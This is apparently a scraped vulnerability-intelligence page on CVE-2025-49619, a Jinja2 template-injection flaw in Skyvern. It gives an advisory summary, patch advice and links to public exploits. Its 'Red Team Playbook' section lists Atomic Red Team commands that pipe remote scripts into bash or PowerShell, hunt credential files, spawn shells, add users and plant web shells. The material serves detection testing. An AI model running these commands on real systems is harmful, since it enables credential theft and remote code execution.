CVE-2025-49619
Overview
This vulnerability is a server-side template injection (SSTI) affecting the Skyvern product up to version 0.1.85. The root cause is improper sanitization of user input within Jinja2 templates, specifically in the Prompt field of workflow blocks such as the Navigation v2 Block. This flaw allows crafted expressions to be evaluated on the server-side, compromising template rendering logic.
Vulnerability Description
Skyvern through 0.1.85 is vulnerable to server-side template injection (SSTI) in the Prompt field of workflow blocks such as the Navigation v2 Block. Improper sanitization of Jinja2 template input allows authenticated users to inject crafted expressions that are evaluated on the server, leading to blind remote code execution (RCE).
Impact
An attacker with authenticated access can exploit this vulnerability to execute arbitrary code on the server via crafted template expressions, enabling blind remote code execution. The attack requires network access and valid user credentials with permission to modify workflow blocks. Successful exploitation can result in unauthorized data access, potential lateral movement within the environment, and compromise of server integrity. The CVSS vector indicates low attack complexity (AC:L) and privileges required (PR:L) with no user interaction (UI:N).
Solution
Upgrade Skyvern to a version later than 0.1.85 where the issue is patched, as documented in the official GitHub repository commit db856cd8433a204c8b45979c70a4da1e119d949d. Follow the vendor's update instructions available at https://github.com/Skyvern-AI/skyvern for applying the fix. No specific workaround is documented; therefore, timely patching is the recommended remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from a server-side template injection (SSTI) flaw present in a specific version of a software product. This issue is primarily due to inadequate sanitization of user inputs in the Prompt field of workflow blocks, particularly within the Navigation v2 Block. The underlying technology, Jinja2, is widely used for rendering templates in Python applications. When an attacker is able to manipulate the input, they can inject crafted expressions that the server evaluates, leading to potentially severe consequences such as blind remote code execution (RCE). This vulnerability highlights the critical importance of input validation and the risks associated with template engines that do not adequately sanitize user-provided data.
Exploitation of this vulnerability can occur through various attack vectors. An authenticated user, who may have legitimate access to the application, can exploit the flaw by submitting specially crafted input in the affected Prompt field. This input could include malicious Jinja2 expressions designed to execute arbitrary code on the server. Given that the execution occurs on the server-side, the attacker may not receive immediate feedback, hence the term "blind" remote code execution. This characteristic complicates detection efforts, as the attacker can execute commands without direct interaction or visible output, making it challenging for security teams to identify the exploitation in real-time.
The real-world implications of this vulnerability are significant, particularly for organizations relying on the affected software for critical operations. Successful exploitation can lead to unauthorized access to sensitive data, manipulation of application behavior, or even complete system compromise. The potential for data breaches, loss of customer trust, and regulatory repercussions can translate into substantial financial losses for businesses. Moreover, the ability for an authenticated user to execute arbitrary code raises concerns about insider threats, as malicious insiders could leverage this vulnerability to conduct attacks without raising alarms.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. First and foremost, input validation mechanisms must be strengthened to ensure that user inputs are properly sanitized before being processed by the template engine. Employing a web application firewall (WAF) can help in identifying and blocking malicious requests that attempt to exploit this vulnerability. Regular security assessments, including penetration testing and code reviews, should be conducted to identify and remediate similar vulnerabilities proactively. Additionally, monitoring and logging user activities can aid in detecting unusual behavior that may indicate an exploitation attempt, allowing for timely response and remediation efforts.
In conclusion, the server-side template injection vulnerability poses a serious threat to the integrity and security of applications utilizing the affected software. The ability for authenticated users to execute arbitrary code on the server highlights the necessity for rigorous input validation and robust security practices. Organizations must remain vigilant and adopt comprehensive detection and mitigation strategies to safeguard against such vulnerabilities, ensuring the protection of their systems and sensitive data from potential exploitation.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Skyvern SSTI Remote Code Execution
exploits/linux/http/skyvern_ssti_cve_2025_49619
|
Cristian Branet, msutovsky-r7 | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI | Cristian Branet | webapps | multiple | - | View |
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
cristibtz/CVE-2025-49619
This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.
|
cristibtz | 2 | 0 | 2025-06-09 | View |
Threat Feed
2 eventsProof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-49619 |
| github.com |
GitHub CVE
|
https://github.com/Skyvern-AI/skyvern/commit/db856cd8433a204c8b45979c70a4da1e119d949d |
| cristibtz.github.io |
GitHub CVE
|
https://cristibtz.github.io/posts/CVE-2025-49619/ |
| exploit-db.com |
GitHub CVE
|
https://www.exploit-db.com/exploits/52335 |
| cristibtz.blog |
NVD API
|
https://cristibtz.blog/posts/CVE-2025-49619/ |